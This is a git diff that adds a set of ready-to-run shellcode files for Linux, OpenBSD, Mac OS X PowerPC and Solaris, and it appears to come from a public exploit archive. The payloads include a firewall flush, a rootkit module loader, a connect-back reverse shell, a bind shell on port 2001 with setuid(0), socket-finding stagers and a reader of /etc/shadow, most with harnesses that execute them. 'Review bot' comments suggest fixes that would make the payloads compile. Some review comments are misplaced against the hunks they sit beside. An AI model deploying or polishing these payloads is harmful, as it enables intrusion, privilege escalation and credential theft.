\ No newline at end of file
diff --git a/shellcodes/linux_x86/43664.c b/shellcodes/linux_x86/43664.c
new file mode 100644
index 000000000..a2c2f0990
--- /dev/null
+++ b/shellcodes/linux_x86/43664.c
@@ -0,0 +1,31 @@
+Author: zillion
+Email: zillion@safemode.org
+Home: http://www.safemode.org
+
+Linux x86 shellcode that does an execve() of /sbin/iptables -F in order to
+flush activated firewall rules.
+
+
+File: flush-iptables-shell.c
+
+/*
+ * This shellcode will do /sbin/iptables -F
+ * Written by zillion@safemode.org
+ *
+ */
+
+char shellcode[]=
+ "\xeb\x21\x5e\x31\xc0\x88\x46\x0e\x88\x46\x11\x89\x76\x12\x8d"
+ "\x5e\x0f\x89\x5e\x16\x89\x46\x1a\xb0\x0b\x89\xf3\x8d\x4e\x12"
+ "\x8d\x56\x1a\xcd\x80\xe8\xda\xff\xff\xff\x2f\x73\x62\x69\x6e"
+ "\x2f\x69\x70\x74\x61\x62\x6c\x65\x73\x38\x2d\x46\x32\x33\x34"
+ "\x35\x36\x37\x38\x39\x61\x62\x63\x64\x65";
+
+
+int main()
+{
+
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int)shellcode;
+}
\ No newline at end of file
diff --git a/shellcodes/openbsd_x86/43633.c b/shellcodes/openbsd_x86/43633.c
new file mode 100644
index 000000000..489575140
--- /dev/null
+++ b/shellcodes/openbsd_x86/43633.c
@@ -0,0 +1,53 @@ +/* The modload shellcode + loads /tmp/o.o module + very usefull if you have rootkit as kernel module in the /tmp dir + and you can easily change the path directly in the code + + Size 66 bytes + OS OpenBSD + /rootteam/dev0id (rootteam.void.ru) + dev0id@uncompiled.com + +BITS 32 + +jmp short callme +main: + pop esi + xor eax,eax + push eax + push long 0x68732f6e + push long 0x69622f2f + mov ebx,esp + push eax + push word 0x632d + mov edi,esp + push eax + push esi + push edi + push ebx + mov edi,esp + push eax + push edi + push ebx + push eax + mov al,0x3B + int 0x80 +callme: + call main + db '/sbin/modload /tmp/o.o' +*/ + +char shellcode[] = + "\xeb\x25\x59\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" + "\x69\x89\xe3\x50\x66\x68\x2d\x63\x89\xe7\x50\x51\x57\x53\x89" + "\xe7\x50\x57\x53\x50\xb0\x3b\xcd\x80\xe8\xd6\xff\xff\xff\x2f" + "\x73\x62\x69\x6e\x2f\x6d\x6f\x64\x6c\x6f\x61\x64\x20" + "\x2f\x74\x6d\x70\x2f\x6f\x2e\x6f"; // "/tmp/o.o" < +#include +#include + + + +char shellcode[]= "\x31\xC0" // xor eax,eax + "\x50" // push eax + "\x68\x2F\x2F\x73\x68" // push dword + "\x68\x2F\x62\x69\x6E" // push dword + "\x89\xE3" // mov ebx,esp + "\x50\x50\x53" // push eax, push eax, push ebx + "\xB0\x3B" // mov al,0x3b + "\x6A\x2A" // push byte 0x2a + "\xCD\x80" // int 0x80 + + +int main(int argc, char *argv[]){ +void (*f)(); +char *x = malloc(sizeof(shellcode)); +memcpy(x, shellcode, sizeof(shellcode)); +f = (void (*)()) x; +f(); +} \ No newline at end of file diff --git a/shellcodes/osx_ppc/43610.c b/shellcodes/osx_ppc/43610.c new file mode 100644 index 000000000..70e4e9f80 --- /dev/null +++ b/shellcodes/osx_ppc/43610.c 
@@ -0,0 +1,106 @@ +;;; +;;; PowerPC OSX remote findsock by recv() key shellcode +;;; +;;; Dino Dai Zovi < ddz@theta44.org >, 20040816 +;;; + +.globl _shellcode +.text + +.set KEY, 0x5858580a +.set PTHREAD_EXIT, 0x90017021 ; OSX 10.3.X + +_shellcode: +Lfindsock: + addis r27, 0, hi16(KEY) + ori r27, r27, lo16(KEY) + addis r31, 0, hi16(0xffff0000) + srawi r31, r31, 11 + mtctr r31 + + ;; Count down sockets backwards in hopes of getting our most recent + ;; connection (if we have multiple). +L0: mfctr r3 + addi r3, r3, -1 ; r3 = socket file descriptor + + addi r4, r1, -4 ; r4 = stack buffer + sub r5, r1, r4 ; r5 = 4 + li r6, 0x4140 + srawi r6, r6, 7 ; r6 = MSG_PEEK | MSG_DONTWAIT + addi r7, r5, -4 ; r7 = 0 + addi r8, r5, -4 ; r8 = 0 + li r30, 0x3aff + srawi r0, r30, 9 ; load syscall number into r0 + cmplw r29, r29 + + .long 0x44ffff02 ; recvfrom(s, buf, 4, 0x82, 0, 0) + bdnzt eq, L0 + ;; On syscall error, attempt compare anyway and loop + + lwz r28, -4(r1) + cmplw r28, r27 + bdnzf eq, L0 + ;;; At this point our socket fd is in ctr + +;;; +;;; dup2(2) our socket (in ctr) to stdin, stdout, stderr +;;; +Ldup_fds: + li r30, 0x2d01 + srawi r0, r30, 7 + li r30, 0x666 + srawi r30, r30, 9 + + mfctr r3 + addi r4, r30, -1 + .long 0x44ffff02 ; dup2(sock, 2) + .long 0x7c842008 + + mfctr r3 + addi r4, r30, -2 + .long 0x44ffff02 ; dup2(sock, 1) + .long 0x7c842008 + + mfctr r3 + addi r4, r30, -3 + .long 0x44ffff02 ; dup2(sock, 0) + .long 0x7c842008 + +;;; +;;; VForking shellcode - Call vfork() and execute /bin/sh in child process. +;;; In parent, we exec "/bin/si" ("/bin/sh" + 1), fail, and run the code that +;;; follows the execve(). 
+;;; +Lfork_execve_binsh: + ;; call vfork (necessary to exec in threaded programs) + li r30, 0x42ff + srawi r0, r30, 8 + .long 0x44ffff02 + .long 0x7c842008 + + xor r31, r31, r31 + lis r30, 0x2f2f + addi r30, r30, 0x7367 + add r30, r30, r4 ; In child, $r4 should be zero + lis r29, 0x2f62 + addi r29, r29, 0x696e + xor r28, r28, r28 + addi r27, r1, -12 + stmw r27, -12(r1) ; -12 is arbitrary null-eliding constant + + addi r4, r1, -12 + addi r3, r1, -4 + xor r5, r5, r5 + li r30, 30209 + srawi r0, r30, 9 ; r0 = 59 + .long 0x44ffff02 ; execve(path, argv, NULL) +Lparent: + +;;; +;;; Call pthread_exit in parent process +;;; +Lpthexit: + addis r31, 0, hi16(PTHREAD_EXIT) ; pthread_exit + ori r31, r31, lo16(PTHREAD_EXIT) + mtctr r31 + bctrl \ No newline at end of file diff --git a/shellcodes/osx_ppc/43611.asm b/shellcodes/osx_ppc/43611.asm new file mode 100644 index 000000000..0a6fbdb83 --- /dev/null +++ b/shellcodes/osx_ppc/43611.asm 
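Review bot: This file is assembler source (`.globl _shellcode`, `.text`, `.set KEY, ...`) committed under a `.c` name, so it neither compiles as C nor matches the sibling PPC payloads, which are stored as `.asm` (43611–43614, 43616); rename it or wrap it in a C string with a harness as 43617.c does. `.set PTHREAD_EXIT, 0x90017021 ; OSX 10.3.X` is an absolute library address pinned to one OS release, and the comment should say that explicitly rather than leaving only the version tag.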
@@ -0,0 +1,77 @@ +;; +; +; Name: single_reverse_tcp +; Qualities: Can Have Nulls +; Platforms: MacOS X / PPC +; Authors: H D Moore < hdm [at] metasploit.com > +; Version: $Revision: 1.1 $ +; License: +; +; This file is part of the Metasploit Exploit Framework +; and is subject to the same licenses and copyrights as +; the rest of this package. +; +; Description: +; +; Connect back and spawn a shell +; +; +;; + +.globl _main +.text +_main: + ;; socket + li r3, 2 + li r4, 1 + li r5, 6 + li r0, 97 + sc + xor r0, r0, r0 + mr r30, r3 + + bl _connect + .long 0x00022211 + .long 0x7f000001 + +_connect: + mflr r4 + li r5, 0x10 + li r0, 98 + mr r3, r30 + sc + xor. r5, r5, r5 + +_setup_dup2: + li r5, 2 + +_dup2: + li r0, 90 + mr r3, r30 + mr r4, r5 + sc + xor r0, r0, r0 + subi r5, r5, 1 + cmpwi r5, -1 + bnel _dup2 + +_fork: + li r0, 2 + sc + xor. r5, r5, r5 + +_execsh: + xor. r5, r5, r5 + bnel _execsh + mflr r3 + addi r3, r3, 28 + stw r3, -8(r1) ; argv[0] = path + stw r5, -4(r1) ; argv[1] = NULL + subi r4, r1, 8 ; r4 = {path, 0} + li r0, 59 + sc ; execve(path, argv, NULL) + +; csh removes the need for setuid() +path: + .ascii "/bin/csh" + .long 0x00414243 \ No newline at end of file diff --git a/shellcodes/osx_ppc/43612.asm b/shellcodes/osx_ppc/43612.asm new file mode 100644 index 000000000..65b13eb84 --- /dev/null +++ b/shellcodes/osx_ppc/43612.asm 
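Review bot: The `; License:` header field is blank here and in 43612.asm, 43613.asm and 43614.asm (the following hunks), while the next lines state the code is subject to the Metasploit Framework license; either fill the field in or drop it so the header is not self-contradictory. The two `.long` words after `bl _connect` are the `sockaddr_in` that `_connect` picks up through `mflr r4` and they carry no comment; `; sockaddr_in placeholder: AF_INET/port, then 127.0.0.1` would make the layout readable.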
@@ -0,0 +1,52 @@ +;; +; +; Name: stager_sock_find_peek +; Qualities: Null-Free +; Platforms: MacOS X / PPC +; Authors: H D Moore < hdm [at] metasploit.com > +; Version: $Revision: 1.1 $ +; License: +; +; This file is part of the Metasploit Exploit Framework +; and is subject to the same licenses and copyrights as +; the rest of this package. +; +; Description: +; +; This payload will recv() downward until the read +; data contains the search tag (0xXXXX1337). Once the +; tag is located, it will jump into the payload. The +; recv() call is passed the MSG_PEEK flag, the stage +; will need to flush the recv() queue before doing +; something like dup2'ing a shell. +; +;; + +.globl _main +.text +_main: + li r29, 0xfff + li r30, 0xfff + addic. r28, r29, -0xfff +1 + +findsock: + subf. r30, r28, r30 + blt _main + + subi r0, r29, 0xfff - 102 + mr r3, r30 + subi r4, r1, 4104 + li r5, 4095 + subi r6, r29, 0xfff - 0x82 + .long 0x44ffff02 + xor. r6, r6, r6 + + lhz r27, -4104(r1) + cmpwi r27, 0x1337 + bne findsock + +gotsock: + subi r4, r1, 4100 + mtctr r4 + blectr + xor. r6, r6, r6 \ No newline at end of file diff --git a/shellcodes/osx_ppc/43613.asm b/shellcodes/osx_ppc/43613.asm new file mode 100644 index 000000000..800018812 --- /dev/null +++ b/shellcodes/osx_ppc/43613.asm 
@@ -0,0 +1,49 @@ +;; +; +; Name: stager_sock_find +; Qualities: Can Have Nulls +; Platforms: MacOS X / PPC +; Authors: H D Moore < hdm [at] metasploit.com > +; Version: $Revision: 1.1 $ +; License: +; +; This file is part of the Metasploit Exploit Framework +; and is subject to the same licenses and copyrights as +; the rest of this package. +; +; Description: +; +; This payload will recv() downward until the read +; data contains the search tag (0xXXXX1337). Once the +; tag is located, it will jump into the payload. +; +;; + +.globl _main +.text +_main: + li r29, 0xfff + li r30, 0xfff + addic. r28, r29, -0xfff +1 + +findsock: + subf. r30, r28, r30 + blt _main + + subi r0, r29, 0xfff - 102 + mr r3, r30 + subi r4, r1, 4104 + li r5, 4095 + subi r6, r29, 0xfff - 0x80 + .long 0x44ffff02 + xor. r6, r6, r6 + + lhz r27, -4104(r1) + cmpwi r27, 0x1337 + bne findsock + +gotsock: + subi r4, r1, 4100 + mtctr r4 + blectr + xor. r6, r6, r6 \ No newline at end of file diff --git a/shellcodes/osx_ppc/43614.asm b/shellcodes/osx_ppc/43614.asm new file mode 100644 index 000000000..1fc34d481 --- /dev/null +++ b/shellcodes/osx_ppc/43614.asm 
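Review bot: This file is identical to 43612.asm in the previous hunk apart from the recv flag operand (`subi r6, r29, 0xfff - 0x80` here versus `0xfff - 0x82` there) and a shortened description, yet nothing in the header says so; a comment such as `; same as stager_sock_find_peek but without MSG_PEEK (0x02), so the tag is consumed` would spare the reader a diff. The description could also state that the stage no longer needs to flush the recv() queue, since that is the practical consequence of the changed flag.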
@@ -0,0 +1,76 @@ +;; +; +; Name: stager_sock_reverse_nf.asm +; Qualities: Null-Free +; Platforms: MacOS X / PPC +; Authors: H D Moore < hdm [at] metasploit.com > +; Version: $Revision: 1.1 $ +; License: +; +; This file is part of the Metasploit Exploit Framework +; and is subject to the same licenses and copyrights as +; the rest of this package. +; +; Description: +; +; Connects back, reads 8192 bytes, jumps into payload. +; Socket descriptor is left in r30. +; +;; + + +.globl _main +.text +_main: + +_socket: + li r27, 0x3030 + 97 + subi r0, r27, 0x3030 + 97 - 97 + subi r3, r27, 0x3030 + 97 - 2 + subi r4, r27, 0x3030 + 97 - 1 + subi r5, r27, 0x3030 + 97 - 6 + + .long 0x44ffff02 + xor r5, r5, r5 + mr r30, r3 + +_storeaddr: + + ; port - patch the xor word + li r25, (0x2211^0x4142) + xori r25, r25, 0x4142 + subi r29, r27, 0x3030 + 97 - 2 + slwi r29, r29, 16 + or r29, r29, r25 + stw r29, -20(r1) + + ; addr - patch the xor dword + lis r29, hi16(0x7f000001^0x01020304) + ori r29, r29, lo16(0x7f000001^0x01020304) + lis r28, hi16(0x01020304) + ori r28, r28, lo16(0x01020304) + xor r29, r29, r28 + stw r29, -16(r1) + +konnect: + la r4, -20(r1) + subi r5, r27, 0x3030 + 97 - 16 + subi r0, r27, 0x3030 + 97 - 98 + mr r3, r30 + .long 0x44ffff02 + xor r5, r5, r5 + +reader: + li r29, 0x3330 + srawi r29, r29, 12 + + subi r0, r27, 0x3030 + 97 - 3 + mr r3, r30 + subi r4, r1, 8192+44 + li r5, 8192+44 + mtctr r4 + .long 0x44ffff02 + xor r5, r5, r5 + xor. r5, r5, r5 + blectr + xor r5, r5, r5 \ No newline at end of file diff --git a/shellcodes/osx_ppc/43615.c b/shellcodes/osx_ppc/43615.c new file mode 100644 index 000000000..675c8e7a2 --- /dev/null +++ b/shellcodes/osx_ppc/43615.c 
@@ -0,0 +1,19 @@
+"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x07\xfa"
+"\x38\xa5\xf8\x4a\x3c\xc0\x28\x1a\x60\xc6\x7f\x0e\x38\x85\x07\xee"
+"\x7c\x89\x03\xa6\x80\x9f\xf8\x4a\x7c\x84\x32\x78\x90\x9f\xf8\x4a"
+"\x7c\x05\xf8\xac\x7c\xff\x04\xac\x7c\x05\xff\xac\x3b\xc5\x07\xba"
+"\x7f\xff\xf2\x15\x42\x20\xff\xe0\x4c\xff\x01\x2c\x10\x7a\x7f\x0c"
+"\x10\x9a\x7f\x0f\x10\xba\x7f\x08\x10\x1a\x7f\x6f\x6c\x1a\x7f\x0c"
+"\x54\x1a\x7d\x76\x54\x64\x64\x76\x60\x1a\x7f\x03\x28\x18\x60\x4e"
+"\x28\x1a\x7f\x0e\x54\x92\x7d\xa8\x10\xba\x7f\x1e\x10\x1a\x7f\x66"
+"\x57\xd9\x8c\x76\x6c\x1a\x7f\x0c\x54\x1a\x7d\x76\x10\x1a\x7f\x64"
+"\x57\xd9\x8c\x76\x6c\x1a\x7f\x0c\x54\x1a\x7d\x76\x57\xd9\x8c\x76"
+"\x10\x1a\x7f\x10\x10\x9a\x7f\x1e\xb8\x9b\x80\xe6\x10\xbb\x80\xe6"
+"\x10\x9b\x80\xfe\x6c\x1a\x7f\x0c\x54\x1a\x7d\x76\x54\x64\x64\x76"
+"\x10\xba\x7f\x0c\x10\x1a\x7f\x54\x57\xd9\x8c\x76\x54\xbe\x54\x76"
+"\x6c\x1a\x7f\x0c\x54\x1a\x7d\x76\x10\xbf\x80\xf1\x04\x1f\x80\xf1"
+"\x68\x98\x80\xeb\x10\x1a\x7f\x4c\x6c\x1a\x7f\x0c\x54\x1a\x7d\x76"
+"\x54\xbf\x55\x77\x68\x98\x80\xf3\x54\x72\x7d\xa8\x10\x79\x7f\x26"
+"\xb8\x7b\x80\xf6\xb8\xbb\x80\xf2\x10\x9b\x80\xf6\x10\x1a\x7f\x35"
+"\x54\x1a\x7b\xa2\x6c\x1a\x7f\x0c\x54\x1a\x7d\x76\x57\xfa\x7f\x06"
+"\x07\x78\x16\x60\x07\x79\x0c\x66\x28\x1a\x7f\x0e";
\ No newline at end of file
diff --git a/shellcodes/osx_ppc/43616.asm b/shellcodes/osx_ppc/43616.asm
new file mode 100644
index 000000000..92bbbdf70
--- /dev/null
+++ b/shellcodes/osx_ppc/43616.asm
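Review bot: The hunk is a bare string literal terminated by `;` with no declaration, no harness and no header comment, so the file is neither valid C nor self-describing despite the `.c` name; at minimum add `char shellcode[] =` above it and a header stating the target and what the payload does, as the neighbouring osx_ppc files do. Without that, the only way to learn what this blob is for is to disassemble it.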
@@ -0,0 +1,33 @@ +;;; $Id: ppc-execve.s,v 1.1 2003/03/01 01:10:48 ghandi Exp $ +;;; PPC MacOS X (maybe others) shellcode +;;; +;;; After assembly, change bytes 2 and 3 of the 'sc' instruction encoding +;;; from 0x00 to 0xff. +;;; +;;; ghandi < ghandi@mindless.com > +;;; + +.globl _execve_binsh +.text +_execve_binsh: + ;; Don't branch, but do link. This gives us the location of + ;; our code. Move the address into GPR 31. + xor. r5, r5, r5 ; r5 = NULL + bnel _execve_binsh + mflr r31 + + ;; Use the magic offset constant 268 because it makes the + ;; instruction encodings null-byte free. + addi r31, r31, 268+36 + addi r3, r31, -268 ; r3 = path + + ;; Create argv[] = {path, 0} in the "red zone" on the stack + stw r3, -8(r1) ; argv[0] = path + stw r5, -4(r1) ; argv[1] = NULL + subi r4, r1, 8 ; r4 = {path, 0} + + ;; 59 = 30209 >> 9 (trick to avoid null-bytes) + li r30, 30209 + srawi r0, r30, 9 ; r0 = 59 + sc ; execve(path, argv, NULL) +path: .asciz "/bin/sh" \ No newline at end of file diff --git a/shellcodes/osx_ppc/43617.c b/shellcodes/osx_ppc/43617.c new file mode 100644 index 000000000..b66013a7e --- /dev/null +++ b/shellcodes/osx_ppc/43617.c 
@@ -0,0 +1,62 @@ +/* + * [MacOSX/PowerPC] + * Shellcode for: execve("/bin/sh", ["/bin/sh"], NULL), exit() + * 72 bytes + * hophet [at] gmail.com + * http://www.nlabs.com.br/~hophet/ + * + */ + +#include "stdio.h" +#include "string.h" + +char shellcode[] = + +"\x7c\xa5\x2a\x79" +"\x40\x82\xff\xfd" +"\x7d\x68\x02\xa6" +"\x3b\xeb\x01\x71" +"\x39\x40\x01\x71" +"\x39\x1f\xfe\xce" +"\x7c\xa8\x29\xae" +"\x38\x7f\xfe\xc7" +"\x90\x61\xff\xf8" +"\x90\xa1\xff\xfc" +"\x38\x81\xff\xf8" +"\x38\x0a\xfe\xca" +"\x44\xff\xff\x02" +"\x60\x60\x60\x60" +"\x38\x0a\xfe\x90" +"\x44\xff\xff\x02" +"\x2f\x62\x69\x6e" +"\x2f\x73\x68\x54"; + +int main() { + + void (*p)(); + p = (void *)&shellcode; + printf("Lenght: %d\n", strlen(shellcode)); + p(); +} +/* +.globl _main +.text +_main: + xor. r5, r5, r5 // r5 = NULL + bnel _main + mflr r11 + addi r31, r11, 369 + li r10, 369 + addi r8, r31, -306 + stbx r5, r8, r5 + addi r3, r31, -313 + stw r3, -8(r1) // [/bin/sh] + stw r5, -4(r1) + subi r4, r1, 8 // [/bin/sh] + addi r0, r10, -310 // r0 = 59 + .long 0x44ffff02 // sc opcode + .long 0x60606060 // NOP + addi r0, r10, -368 // r0 = 1 + .long 0x44ffff02 // sc opcode +string: .asciz "/bin/shT" +*/ \ No newline at end of file diff --git a/shellcodes/solaris_sparc/13489.c b/shellcodes/solaris_mips/13489.c similarity index 100% rename from shellcodes/solaris_sparc/13489.c rename to shellcodes/solaris_mips/13489.c diff --git a/shellcodes/solaris_sparc/43621.c b/shellcodes/solaris_sparc/43621.c new file mode 100644 index 000000000..057303f16 --- /dev/null +++ b/shellcodes/solaris_sparc/43621.c 
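Review bot: `printf("Lenght: %d\n", strlen(shellcode))` misspells Length; the corrected line is `printf("Length: %zu\n", strlen(shellcode));`. `#include "stdio.h"` and `#include "string.h"` use the quoted form, which searches the source directory first; angle brackets are the conventional form for system headers. The assembly in the trailing comment block is a welcome reference, but it sits after `main` where a reader of the bytes will miss it; placing it above `char shellcode[]` keeps listing and bytes adjacent.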
@@ -0,0 +1,73 @@
+/*
+ * Solaris shellcode - setreuid(geteuid()), setregid(getegid()), execve /bin/sh
+ *
+ * Claes M. Nyberg 20020124
+ * ,
+ */
+
+#include
+
+static char solaris_code[] =
+
+ /* geteuid() */
+ "\x82\x10\x20\x18" /* mov 24, %g1 */
+ "\x91\xd0\x20\x08" /* ta 0x8 */
+ "\x90\x02\x60\x01" /* add %o1, 1, %o0 */
+
+ /* setreuid() */
+ "\x90\x22\x20\x01" /* sub %o0, 1, %o0 */
+ "\x92\x10\x3f\xff" /* mov -1, %o1 */
+ "\x82\x10\x20\xca" /* mov 202, %g1 */
+ "\x91\xd0\x20\x08" /* ta 0x8 */
+
+ /* getegid() */
+ "\x82\x10\x20\x2f" /* mov 47, %g1 */
+ "\x91\xd0\x20\x08" /* ta 0x8 */
+ "\x90\x02\x60\x01" /* add %o1, 1, %o0 */
+
+ /* setregid() */
+ "\x90\x22\x20\x01" /* sub %o0, 1, %o0 */
+ "\x92\x10\x3f\xff" /* mov -1, %o1 */
+ "\x82\x10\x20\xcb" /* mov 203, %g1 */
+ "\x91\xd0\x20\x08" /* ta 0x8 */
+
+ /* execve(/bin/sh ..) */
+ "\x94\x1a\x80\x0a" /* xor %o2, %o2, %o2 */
+ "\x21\x0b\xd8\x9a" /* sethi %hi(0x2f626800), %l0 */
+ "\xa0\x14\x21\x6e" /* or %l0, 0x16e, %l0 */
+ "\x23\x0b\xcb\xdc" /* sethi %hi(0x2f2f7000), %l1 */
+ "\xa2\x14\x63\x68" /* or %l1, 0x368, %l1 */
+ "\xd4\x23\xbf\xfc" /* st %o2, [%sp - 4] */
+ "\xe2\x23\xbf\xf8" /* st %l1, [%sp - 8] */
+ "\xe0\x23\xbf\xf4" /* st %l0, [%sp - 12] */
+ "\x90\x23\xa0\x0c" /* sub %sp, 12, %o0 */
+ "\xd4\x23\xbf\xf0" /* st %o2, [%sp - 16] */
+ "\xd0\x23\xbf\xec" /* st %o0, [%sp - 20] */
+ "\x92\x23\xa0\x14" /* sub %sp, 20, %o1 */
+ "\x82\x10\x20\x3b" /* mov 59, %g1 */
+ "\x91\xd0\x20\x08" /* ta 0x8 */
+
+ /* exit() */
+ "\x82\x10\x20\x01" /* mov 1, %g1 */
+ "\x91\xd0\x20\x08"; /* ta 0x8 */
+
+
+static char _solaris_code[] =
+ "\x82\x10\x20\x18\x91\xd0\x20\x08\x90\x02\x60\x01\x90\x22"
+ "\x20\x01\x92\x10\x3f\xff\x82\x10\x20\xca\x91\xd0\x20\x08"
+ "\x82\x10\x20\x2f\x91\xd0\x20\x08\x90\x02\x60\x01\x90\x22"
+ "\x20\x01\x92\x10\x3f\xff\x82\x10\x20\xcb\x91\xd0\x20\x08"
+ "\x94\x1a\x80\x0a\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b"
+ "\xcb\xdc\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8"
+ "\xe0\x23\xbf\xf4\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23"
+ "\xbf\xec\x92\x23\xa0\x14\x82\x10\x20\x3b\x91\xd0\x20\x08"
+ "\x82\x10\x20\x01\x91\xd0\x20\x08";
+
+int
+main(void)
+{
+ void (*code)() = (void *)_solaris_code;
+ printf("Shellcode length: %d\n", strlen(_solaris_code));
+ code();
+ return(1);
+}
\ No newline at end of file
diff --git a/shellcodes/solaris_sparc/43622.asm b/shellcodes/solaris_sparc/43622.asm
new file mode 100644
index 000000000..9dacd162d
--- /dev/null
+++ b/shellcodes/solaris_sparc/43622.asm
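Review bot: The hunk carries the same bytes twice, annotated in `solaris_code` and concatenated in `_solaris_code`, and only the second copy is executed, so the two can silently drift apart; keep one array (adjacent literals concatenate, so the annotated form runs as-is) or add a comment saying they must be kept in sync. `return(1)` after `code()` reports failure on the only path where `main` returns, which looks unintended; 43625.c has the same `return(1)`. The bare `#include` with no header name also appears in 43625.c and is probably a rendering loss of `<stdio.h>`/`<string.h>`, but the raw file should be checked, since without it `printf`/`strlen` are undeclared.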
@@ -0,0 +1,87 @@ +!!! $Id: sparc-bind.s,v 1.1 2003/03/01 01:10:51 ghandi Exp $ +!!! Bind /bin/sh to TCP port 2001. Calls setuid(0) so /bin/sh won't +!!! drop privileges. After assembly, change the third byte in the +!!! trap instructions to 0x38 to avoid having spaces in the input so that +!!! it may be used in an HTTP GET request. For Solaris/SPARC. +!!! +!!! "I've come here to chew bubble-gum and kick ass...And I'm all out of +!!! bubble gum." +!!! -- Nada (Roddy Piper), "They Live" +!!! +!!! -ghandi < ghandi@mindless.com > +!!! + +.global bindsh +.type bindsh,#function + +bindsh: sub %sp, 16, %l0 ! struct sockaddr sa; + + sub %sp, %l0, %l7; + st %l7, [%sp - 20] ! int sa_len = 16; + + sub %l7, 14, %o0 + sub %l7, 14, %o1 + xor %l1, %l1, %o2 + xor %l1, %l1, %o3 ! %o3 will be used as a %g0 + sub %l7, 15, %o4 + add %l7, (230 - 16), %g1 + ta 8 + xor %o2, %o0, %l2 ! s = socket(AF_INET, SOCK_STREAM, 0); + + sth %o1, [%sp - 16] ! sa.sin_family = AF_INET; + mov 2001, %l6 + sth %l6, [%sp - 14] ! sa.sin_port = 2001; + st %g0, [%sp - 12] ! sa.sin_addr.s_addr = INADDR_ANY; + + xor %o3, %l2, %o0 + xor %o3, %l0, %o1 + xor %o3, %l7, %o2 + add %l7, (232 - 16), %g1 + ta 8 ! bind(s, &sa, sa_len); + + xor %o3, %l2, %o0 + sub %l7, (16 - 5), %o1 + add %l7, (233 - 16), %g1 + ta 8 ! listen(s, SOMAXCONN); + + xor %o3, %l2, %o0 + xor %o3, %l0, %o1 + sub %sp, 20, %o2 + add %l7, (234 - 16), %g1 + ta 8 + xor %o3, %o0, %l3 ! c = accept(s, &sa, &sa_len); + + xor %o3, %l3, %o0 + sub %l7, (16 - 9), %o1 + xor %sp, %sp, %o2 + add %l7, (62 - 16), %g1 + ta 8 ! ioctl(c, I_DUP2FD, 0); + + xor %o3, %l3, %o0 + sub %l7, (16 - 9), %o1 + add %o3, 1, %o2 + add %l7, (62 - 16), %g1 + ta 8 ! ioctl(c, I_DUP2FD, 1); + + xor %o3, %l3, %o0 + sub %l7, (16 - 9), %o1 + add %o3, 2, %o2 + add %l7, (62 - 16), %g1 + ta 8 ! ioctl(c, I_DUP2FD, 2); + + xor %sp, %sp, %o0 ! %o0 = 0; + add %o3, 23, %g1 + ta 8 ! setuid(0); + set 0x2f62696e, %l0 ! (void*)sh = '/bin'; + set 0x2f736800, %l1 ! 
(void*)sh + 4 = '/sh0'; + sub %sp, 16, %o0 ! %o0 = '/bin/sh'; + sub %sp, 8, %o1 ! %o1 = {'/bin/sh', NULL}; + xor %sp, %sp, %o2 ! %o2 = NULL; + std %l0, [%sp - 16] + st %o0, [%sp - 8] ! argv[0] = sh; + st %g0, [%sp - 4] ! argv[1] = NULL; + add %o3, 59, %g1 + ta 8 ! execve(sh, argv, NULL); + xor %sp, %sp, %o0 ! %o0 = 0; + add %o3, 160, %g1 ! %g1 = 160; + ta 8 ! lwp_exit(0) \ No newline at end of file diff --git a/shellcodes/solaris_sparc/43623.asm b/shellcodes/solaris_sparc/43623.asm new file mode 100644 index 000000000..bb5ed3b30 --- /dev/null +++ b/shellcodes/solaris_sparc/43623.asm @@ -0,0 +1,78 @@ +## +# +# Name: single_bind_tcp +# Platforms: Solaris +# Authors: vlad902 +# Version: $Revision: 1.2 $ +# License: +# +# This file is part of the Metasploit Exploit Framework +# and is subject to the same licenses and copyrights as +# the rest of this package. +# +# Description: +# +# Single bind TCP shell. +# +## + +.globl main + +main: + andn %sp, 7, %sp + + mov 1, %o4 + xor %o3, %o3, %o3 + xor %o3, %o3, %o2 + mov 0x02, %o1 + mov 0x02, %o0 + mov 0xe6, %g1 + ta 0x08 + + st %o0, [ %sp - 0x08 ] + +#ifndef NO_NULLS + set 0x00027a68, %l0 +#else + set 0x27a68fff, %l0 + srl %l0, 12, %l0 +#endif + st %l0, [ %sp - 0x10 ] + st %g0, [ %sp - 0x0c ] + sub %sp, 16, %o1 + mov 0x10, %o2 + mov 0xe8, %g1 + ta 0x08 + + ld [ %sp - 0x08 ], %o0 + mov 0x01, %o1 + mov 0xe9, %g1 + ta 0x08 + + ld [ %sp - 0x08 ], %o0 + xor %o1, %o1, %o1 + or %o1, %o1, %o2 + mov 0xea, %g1 + ta 0x08 + + st %o0, [ %sp - 0x08 ] + mov 3, %o2 +fcntl_loop: + mov 9, %o1 + subcc %o2, 1, %o2 + mov 0x3e, %g1 + ta 0x08 + + bnz fcntl_loop + ld [ %sp - 0x08 ], %o0 + + xor %o3, %o3, %o2 + set 0x2f62696e, %l0 + set 0x2f736800, %l1 + sub %sp, 0x10, %o0 + sub %sp, 0x08, %o1 + std %l0, [ %sp - 0x10 ] + st %o0, [ %sp - 0x08 ] + st %g0, [ %sp - 0x04 ] + mov 0x3b, %g1 + ta 0x08 \ No newline at end of file diff --git a/shellcodes/solaris_x86/43624.asm b/shellcodes/solaris_x86/43624.asm new file mode 100644 index 000000000..36dd90456 
--- /dev/null
+++ b/shellcodes/solaris_x86/43624.asm
@@ -0,0 +1,50 @@
+Name = John Babio
+Twitter = 3vi1john
+
+SunOS opensolaris 10 5.11 i86pc i386 i86pc
+
+setuid(0) /bin/cat //etc/shadow
+
+char code[]=
+ "\x33\xc0\x50\x50\xb0\x17\xcd\x91\x33\xd2\x52\x68\x61\x64\x6f"
+ "\x77\x68\x63\x2f\x73\x68\x68\x2f\x2f\x65\x74\x8b\xcc\x52\x68"
+ "\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x8b\xdc\x52\x51\x53\x8b"
+ "\xcc\x52\x51\x53\xb0\x3b\x52\xcd\x91\x33\xc0\x50\xb0\x01\xcd\x91";
+
+int main(int argc, char **argv)
+{
+ int (*func)();
+ func = (int (*)()) code;
+ (int)(*func)();
+}
+
+8050410 <_start>:
+ 8050410: 33 c0 xor %eax,%eax
+ 8050412: 50 push %eax
+ 8050413: 50 push %eax
+ 8050414: b0 17 mov $0x17,%al
+ 8050416: cd 91 int $0x91
